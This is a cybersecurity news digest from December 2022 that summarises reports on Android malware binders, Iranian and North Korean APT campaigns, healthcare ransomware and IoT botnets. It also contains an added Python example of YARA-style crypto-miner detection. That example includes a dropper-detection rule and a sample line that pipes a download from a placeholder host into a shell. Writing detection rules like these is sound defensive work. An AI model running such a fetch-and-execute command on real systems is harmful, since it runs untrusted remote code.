Friday, December 09, 2022 // (IG): BB // Bubba3dPrints // Coffee for Bob
Researchers Uncover Darknet Service Allowing Hackers to Trojanize Legit Android Apps
FROM THE MEDIA: Researchers have shed light on a new hybrid malware campaign targeting both Android and Windows operating systems in a bid to expand its pool of victims. The attacks entail the use of different malware such as ERMAC, Erbium, Aurora, and Laplas, according to a ThreatFabric report shared with The Hacker News. "This campaign resulted in thousands of victims," the Dutch cybersecurity company said, adding, "Erbium stealer successfully exfiltrated data from more than 1,300 victims."
READ THE STORY: THN
MuddyWater Hackers Target Asian and Middle East Countries with Updated Tactics
FROM THE MEDIA: The Iran-linked MuddyWater threat actor has been observed targeting several countries in the Middle East as well as Central and West Asia as part of a new spear-phishing activity. "The campaign has been observed targeting Armenia, Azerbaijan, Egypt, Iraq, Israel, Jordan, Oman, Qatar, Tajikistan, and the United Arab Emirates," Deep Instinct researcher Simon Kenin said in a technical write-up. MuddyWater, also called Boggy Serpens, Cobalt Ulster, Earth Vetala, Mercury, Seedworm, Static Kitten, and TEMP.Zagros, is said to be a subordinate element within Iran's Ministry of Intelligence and Security (MOIS).
READ THE STORY: THN
Persecution of Falun Gong Laid Groundwork for China’s Digital Totalitarianism
FROM THE MEDIA: Former Chinese leader Jiang Zemin recently passed away, leaving behind a legacy that includes ushering China into a modern surveillance state. “Jiang took critical steps in the early days of the internet in China to build the system today known as the Great Firewall, cutting off Chinese users from the rest of the world,” Sarah Cook, research director for China, Hong Kong, and Taiwan at Freedom House, wrote on Twitter after China’s state-run media announced Jiang’s death on Nov. 30.
READ THE STORY: The Epoch Times
Android app with over 5m downloads leaked user browsing history
FROM THE MEDIA: A browsing app for Android devices, Web Explorer – Fast Internet, left open its Firebase instance, exposing app and user data, the Cybernews research team has discovered. Firebase is a mobile application development platform that offers many features, including analytics, hosting, and real-time cloud storage. Web Explorer – Fast Internet is a browsing app with over five million downloads on the Google Play store. It boasts of increasing browsing speed by 30% and has a user rating average of 4.4 out of five stars, across more than 58,000 reviews.
READ THE STORY: Security Affairs
APT37 Uses Internet Explorer Zero-Day to Spread Malware
FROM THE MEDIA: North Korean threat group APT37 was able to exploit an Internet Explorer zero-day vulnerability to deploy documents loaded with malware as part of its ongoing campaign targeting users in South Korea, including defectors, journalists, and human rights groups. Google's Threat Analysis Group (TAG) found the zero-day flaw in the Internet Explorer JScript engine in late October, tracked under CVE-2022-41128, and now reports that Microsoft was responsive and has issued applicable patches.
READ THE STORY: DARKReading
CommonSpirit Health ransomware attack exposed data of 623,000 patients
FROM THE MEDIA: CommonSpirit Health has confirmed that threat actors accessed the personal data for 623,774 patients during an October ransomware attack. This figure was published today on the U.S. Department of Health breach portal, where healthcare organizations are legally obligated to report data breaches impacting over 500 individuals. At the start of October, the Illinois-based non-profit health system first informed the public of a cyberattack that took down its IT systems. CommonSpirit Health is the second largest health system in the United States, operating 140 hospitals and over 1,000 care sites across 21 states, so any disruption in its operation has widespread impact potential.
READ THE STORY: Bleeping Computer
U.S. extends three firms' export ban over China exports
FROM THE MEDIA: The U.S. Commerce Department will continue to deny three U.S.-based firms' export privileges, the government announced on Thursday, saying the companies had illegally exported satellite, rocket and defense technology to China. The extension came after new concerns about Quicksilver Manufacturing Inc, Rapid Cut LLC and U.S. Prototype Inc, which the Commerce Department said in a June 7 order had sent technical drawings and blueprints from U.S. customers to manufacturers in China to 3-D print satellite, rocket and defense-related prototypes without authorization.
READ THE STORY: Reuters
US Health Dept warns of Royal Ransomware targeting healthcare
FROM THE MEDIA: The U.S. Department of Health and Human Services (HHS) issued a new warning today for the country's healthcare organizations regarding ongoing attacks from a relatively new operation, the Royal ransomware gang. The Health Sector Cybersecurity Coordination Center (HC3) —HHS' security team— revealed in a new analyst note published Wednesday that the ransomware group has been behind multiple attacks against U.S. healthcare orgs. "Since its appearance, HC3 is aware of attacks against the Healthcare and Public Healthcare (HPH) sector," the advisory says.
READ THE STORY: Bleeping Computer
Iranian APT Agrius Targets Diamond Industry Worldwide With Fantasy Wiper
FROM THE MEDIA: An Iran-based advanced persistent threat (APT) group known as Agrius has conducted supply chain-focused attacks against the diamond industry (and others) across three continents. The claims come from ESET security researchers, who published an advisory about Agrius on the company's WeLiveSecurity blog on Wednesday. In the technical write-up, ESET senior threat intelligence analyst Adam Burgher said the team analyzed a supply chain attack targeted at an Israeli software developer to deploy Fantasy, Agrius’s new wiper. “The Fantasy wiper is built on the foundations of the previously reported Apostle wiper but does not attempt to masquerade as ransomware, as Apostle originally did,” Burgher explained.
READ THE STORY: InfoSecMag // SCMAG
Identification and Classification of Crypto-Malware Using ThreatMapper
FROM THE MEDIA: ThreatMapper, our open-source Cloud Native Application Protection Platform (CNAPP), now integrates natively with YaraHunter. YaraHunter is a powerful malware scanner for cloud-native environments: containers, images and hosts. In a previous post, we discussed scanning cloud-native assets for malware using YaraHunter to identify and report possible indicators of malware across different cloud resources, pods, virtual machines, file systems, image registries, and build artifacts. In this post, we will discuss using ThreatMapper to classify various cloud-native malware, the enhancements to the Yara rulesets to identify crypto signature malware risks, and prioritize those risks using runtime context to build a better security posture.
READ THE STORY: Security Boulevard
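The post above describes two steps: matching YARA-style string rules against files to classify them (here, as crypto-mining malware), then ranking the findings by runtime context. The following is an added illustration of that workflow, not ThreatMapper's or YaraHunter's own code or rulesets: the rules, the family labels, the context weights and the sample file contents are all constructed assumptions chosen to show how a rule condition ("at least N of these strings") and a context-based score fit together.

```python
"""Added example, not ThreatMapper/YaraHunter code: a minimal YARA-style
string-rule matcher for crypto-miner indicators, plus a re-ranking step that
weights each finding by runtime context. Rules, families, weights and the
sample blobs below are illustrative assumptions."""
from dataclasses import dataclass, field
from typing import Dict, List


@dataclass
class Rule:
    name: str
    family: str                 # classification label the rule contributes
    strings: Dict[str, bytes]   # YARA-like $identifier -> byte pattern
    min_matches: int = 1        # condition: at least N of the strings present


# Illustrative rules (assumed); real rulesets carry far more patterns.
RULES: List[Rule] = [
    Rule("xmrig_strings", "cryptominer",
         {"$a": b"xmrig", "$b": b"stratum+tcp://", "$c": b"cryptonight"}, 2),
    Rule("monero_wallet_hint", "cryptominer",
         {"$a": b"--donate-level", "$b": b"rx/0"}, 2),
    Rule("generic_shell_dropper", "dropper",
         {"$a": b"curl -fsSL", "$b": b"| sh", "$c": b"chmod +x"}, 2),
]


@dataclass
class Match:
    rule: str
    family: str
    matched: List[str] = field(default_factory=list)


def scan(blob: bytes, rules: List[Rule] = RULES) -> List[Match]:
    """Return every rule whose condition (>= min_matches strings found) holds."""
    hits = []
    for r in rules:
        found = [ident for ident, pat in r.strings.items() if pat in blob]
        if len(found) >= r.min_matches:
            hits.append(Match(r.name, r.family, found))
    return hits


def classify(matches: List[Match]) -> str:
    """Collapse rule hits to one family label; a miner hit outranks the rest."""
    families = {m.family for m in matches}
    if "cryptominer" in families:
        return "cryptominer"
    if families:
        return sorted(families)[0]
    return "clean"


# Assumed runtime-context weights: the same bytes matter more in a running,
# internet-exposed, privileged workload than in an image nobody deploys.
CONTEXT_WEIGHTS = {"running": 3, "internet_exposed": 2, "privileged": 2}


def prioritize(family: str, context: Dict[str, bool]) -> int:
    """Score 0-10: base severity for the family plus runtime-context bonuses."""
    base = {"cryptominer": 5, "dropper": 4, "clean": 0}.get(family, 2)
    if base == 0:
        return 0
    bonus = sum(w for k, w in CONTEXT_WEIGHTS.items() if context.get(k))
    return min(10, base + bonus)


# Constructed sample artifacts standing in for files pulled from image layers.
SAMPLES = {
    "miner.bin": b"\x7fELF..." + b"xmrig/6.18 stratum+tcp://pool.example:3333"
                 b" --donate-level=1 rx/0",
    "entrypoint.sh": b"#!/bin/sh\ncurl -fsSL http://example.invalid/x | sh\n",
    "app.jar": b"PK\x03\x04 ordinary application bytes",
}


def triage(samples=SAMPLES, context=None):
    """Scan, classify and score each sample; returns {name: (family, score)}."""
    context = context or {}
    out = {}
    for name, blob in samples.items():
        fam = classify(scan(blob))
        out[name] = (fam, prioritize(fam, context.get(name, {})))
    return out


if __name__ == "__main__":
    ctx = {"miner.bin": {"running": True, "internet_exposed": True, "privileged": True},
           "entrypoint.sh": {"running": False}}
    ranked = sorted(triage(SAMPLES, ctx).items(), key=lambda kv: -kv[1][1])
    for name, (fam, score) in ranked:
        print(f"{score:2d}  {fam:12s} {name}")
```

The point of the second step is the one the post makes: a crypto-miner signature found in a stale image and the same signature found in a privileged, internet-facing running container are the same detection but not the same risk, so the ranking a responder sees should come from context, not from the rule alone.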
REvil-hit Medibank to pull plug on IT, shore up defenses
FROM THE MEDIA: Australian health insurance company Medibank will take all of its IT systems offline and close its branches over the weekend as part of its ongoing efforts to improve security and recover from a massive data security breach in October. The planned outage, dubbed Operation Safeguard, begins at 2030 Sydney time on Friday, December 9. The insurer said it expects all systems to be back online by Sunday "at the latest." Microsoft's response team will show up at the insurer's Melbourne headquarters to help with the security overhaul.
READ THE STORY: The Register
Automated dark web markets sell corporate email accounts for $2
FROM THE MEDIA: Cybercrime marketplaces are increasingly selling stolen corporate email addresses for as low as $2 to fill a growing demand by hackers who use them for business email compromise and phishing attacks or initial access to networks. Analysts at Israeli cyber-intelligence firm KELA have closely followed this trend, reporting at least 225,000 email accounts for sale on underground markets. The largest webmail shops are Xleet and Lufix, claiming to offer access to over 100k breached corporate email accounts, with prices ranging between $2 and $30, if not more, for highly-desirable organizations.
READ THE STORY: Bleeping Computer
‘Zombinder’ service allows cybercriminals to easily add malware to legitimate apps
FROM THE MEDIA: A newly discovered service on the dark web has been found to allow cybercriminals to easily add malware to legitimate apps. Detailed today by researchers at ThreatFabric B.V., “Zombinder” was discovered while researching several cases of threat actors using a form of Android banking malware known as Ermac. As the researchers dug further, they uncovered a campaign that employed several different types of malware targeting Android and Windows users, including Erbium, the Aurora stealer and Laplas “clipper.”
READ THE STORY: SiliconAngle
Google: How Android’s Private Compute Core protects your data
FROM THE MEDIA: Google has disclosed more technical details about how Private Compute Core (PCC) on Android works and keeps sensitive user data processed locally on protected devices. Introduced in Android 12, PCC is a secure, isolated, and trusted environment within the operating system where data from sensors, GPS, microphone, camera, and screen are stored and processed to offer machine learning features to the user. Examples of those intelligent features include 'Live Caption,' which uses the microphone for speech recognition, 'Now Playing,' which recognizes the song, or 'Smart Reply,' which suggests responses in messaging apps.
READ THE STORY: Bleeping Computer
Ukraine-Russia War: Putin Hedging on Cyberwarfare
FROM THE MEDIA: If there’s one thing we learned in this months-long run of the Ukraine-Russia war, it is that Russian troops are not only demoralized but have fallen short of expectations. Moreover, many of the factors of their loss could be attributed to poor military leadership compared to Ukraine’s highly streamlined directives from their generals. Nonetheless, Russia continues to attack Ukrainians in more ways than the battle on the borders. One way they’re doing that is by cyber warfare. Russia has been using highly sophisticated cyber-attacks to achieve its strategic objectives in Ukraine.
READ THE STORY: SOFREP
Novel Botnet Dubbed 'Zerobot' Targets Slew of IoT Devices
FROM THE MEDIA: A novel botnet is taking advantage of vulnerabilities in a slew of networking equipment and networked cameras with an emphasis on equipment manufactured in East Asia. Among the targeted devices are three types of Totolink-brand routers made by Hong Kong-based Zioncom and a variety of cameras made by China-based Hikvision. The botnet, dubbed Zerobot by cybersecurity firm Fortinet, also uses a vulnerability identified in thermal sensor cameras made by U.S.-based Teledyne FLIR.
READ THE STORY: BankInfoSec
North Korea using freelance techies to fund missiles and nukes
FROM THE MEDIA: North Korean IT pros are using freelancing platforms to earn money that the nation's authoritarian government uses to fund the development of missiles and nuclear weapons, according to South Korea's government. Seoul therefore wants gig platforms to impose stricter checks to restrict its enemy's activities. South Korea's intelligence services, national police, and five ministries yesterday published a warning about the North's (DPRK) tactics.
READ THE STORY: The Register
Elon Musk's brain chip company has killed so many animals that the USDA is investigating them
FROM THE MEDIA: Elon Musk can't stay out of the headlines. The Silicon Valley tycoon, already under fire for making a series of unpopular changes at Twitter after purchasing the company for a deal in which he admits he overpaid, is embroiled in a new controversy over Neuralink — a smaller company he founded with the express intent to develop implantable brain chips that can interact with computers. In the process of testing brain implants on animals, Neuralink has allegedly killed almost all of them. Now, Musk's medical device company is being investigated by the federal government for possible animal-welfare violations.
READ THE STORY: Salon
Overlooked Chinese Chip Maker’s Military-Industrial Ties Revealed
FROM THE MEDIA: A critical yet little-known chipmaker that supplies several big-name Chinese military companies is facing heightened scrutiny as a new report, expected today, will warn that Beijing wants to use the firm to increase foreign dependency on Chinese supply chains. Its release comes amid news that Congress this week watered down a bill to address that threat.
READ THE STORY: National Review
Metropolitan Opera dealing with cyberattack that shut down website, box office
FROM THE MEDIA: The Metropolitan Opera confirmed that it is dealing with a crippling cyberattack that has shut down their website and box office. The New York-based opera house said on Wednesday evening that the cyberattack impacted their network systems, including their “website, box office, and call center.” While all performances will continue as scheduled, the organization is unable to process new ticket orders or provide exchanges and refunds. “Once normal operations have resumed, we will honor all refunds and exchanges that we have been unable to process during this period,” the company said in a statement on Twitter.
READ THE STORY: The Record
South Korean authorities issue warning about disguised North Koreans getting IT jobs
FROM THE MEDIA: South Korean authorities issued an interagency advisory Thursday warning companies about hiring North Korean IT workers who disguise their true nationality and use their wages to help fund the country’s sanctioned nuclear weapons program. The advisory was published by several ministries, alongside South Korea’s National Police Agency and its National Intelligence Service, requesting “enhanced due diligence and more stringent identity verification process from domestic companies to avoid hiring or engaging in business contracts with [North Korean] IT workers who disguise their nationality and identities.”
READ THE STORY: The Record
US National Cyber Director plans Japan trip to bolster digital cooperation
FROM THE MEDIA: U.S. National Cyber Director Chris Inglis plans on traveling to Japan later this month to advise government officials there on bolstering cybersecurity defenses, according to a source briefed on the upcoming trip. The official visit appears to be an effort to improve cybersecurity cooperation with a key ally in Asia amid a strained relationship between the United States and China, according to two people who confirmed Inglis’ travel plans but asked not to be named because they are not authorized to speak to the press.
READ THE STORY: Cyberscoop
Google Ad Manager outage costs big websites ad sales
FROM THE MEDIA: A Google service relied upon by many large websites to sell and display ads was down for about three hours Thursday, denying major news publishers revenue during the crucial holiday period, two sources familiar with the matter said. "The issue with Google Ad Manager has been resolved and ad serving has now been restored for the affected users,” Google said in a tweet on Thursday evening. “We apologize for the inconvenience.”
READ THE STORY: Reuters
Killer robots have arrived on Ukrainian battlefields
FROM THE MEDIA: Amid Ukraine’s muddy trench warfare, grinding artillery bombardments and Soviet-era tank battles, a futuristic digital war is waged as the line between human and machine decision-making becomes ever thinner. Since Russia invaded Ukraine in February, AI-powered drones — both homemade and highly sophisticated — have been deployed on an unprecedented scale on the battlefield. Russia has reportedly used the Kalashnikov Kub and Lancet Kamikaze “highly autonomous” drones. Ukraine has relied on the Turkish Bayraktar TB2 that has autonomous flight capabilities and boasts “laser guided smart ammunition.”
READ THE STORY: .Coda
China's Reported Manipulation of Twitter Draws Lawmaker Questions
FROM THE MEDIA: Influential lawmakers on the House Intelligence Committee sent a letter to Twitter CEO Elon Musk on Tuesday expressing “deep concern” over reports that the People’s Republic of China—or PRC—orchestrated a manipulation campaign on the social media platform to obscure news about mass public demonstrations across the country. “We are gravely concerned about the potential impacts of the PRC’s growing cyber-enabled capabilities, including foreign malign influence operations, on U.S. national security interests both at home and abroad,” Committee Chairman Adam Schiff, D-Calif., and Reps. Raja Krishnamoorthi, D-Ill., and Jackie Speier, D-Calif., said in the Dec. 6-dated letter.
READ THE STORY: NextGov
Semiconductors, The Fourth Industrial Revolution and the End of Globalization
FROM THE MEDIA: Semiconductors are a key player in the Fourth Industrial Revolution as they are at the heart of so many inventions with potential to dramatically affect the production capabilities in many industries, including computing, healthcare, military systems, transportation, and clean energy. But, as only a handful of countries have the complex knowledge and capital capacity needed to produce them, their limited supply became a geopolitical thorn involving harsh trade wars and security risks.
READ THE STORY: Yahoo Finance
Rise of deep-fakes to spread misinformation for Ukraine – Russia crisis, possible spillovers, and impact
FROM THE MEDIA: Volodymyr Zelensky appeared in a video during the third week of the Ukraine crisis earlier this year, wearing a dark green shirt and speaking slowly and deliberately while standing behind a white presidential podium bearing his country’s coat of arms. The Ukrainian president’s body barely moved as he spoke, with the exception of his head. As he appeared to exhort Ukrainians to surrender to Russia, his voice sounded warped and almost gravelly. In the tape, which was instantly detected as a deep-fake, he appeared to say, in Ukrainian, “I ask you to lay down your weapons and go back to your families,” and “This war is not worth dying for.”
READ THE STORY: Modern Diplomacy
Items of interest
NDAA requires intelligence agencies to study creation of cyber collaboration program
FROM THE MEDIA: Key federal agencies in charge of intelligence and cybersecurity will be required by the upcoming National Defense Authorization Act (NDAA) bill to study how to build a new cyber information collaboration environment to enable government and industry to better mitigate malicious cyber activity. The leaders of the National Security Agency (NSA) and Cybersecurity & Infrastructure Security Agency (CISA) will be required by April 30, 2023, to conduct a study and brief relevant Armed Services Committees in Congress regarding how Department of Defense components and entities, such as the NSA, can support the development of a “cyber threat information collaboration environment program,” the NDAA 2023 bill stated.
READ THE STORY: Fedscoop
Stephan Gerling - Yacht Hacking from SatCOM to engine control - DEF CON 27 Hack the Sea Village (Video)
FROM THE MEDIA: Yacht Hacking from SatCOM.
Hack a Satellite [Hack-A-Sat] Contest | DEF CON 29 (Video)
FROM THE MEDIA: Hacking a Satellite is beyond standard application and web security. When I stumbled across Hack-A-Sat at DEF CON 29, I had to stop and hear about what it was all about.
These open source products are reviewed from analysts at InfoDom Securities and provide possible context about current media trends in regard to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not specifically endorse any third-party claims made in their original material or related links on their sites, and the opinions expressed by third parties are theirs alone. Contact InfoDom Securities at dominanceinformation@gmail.com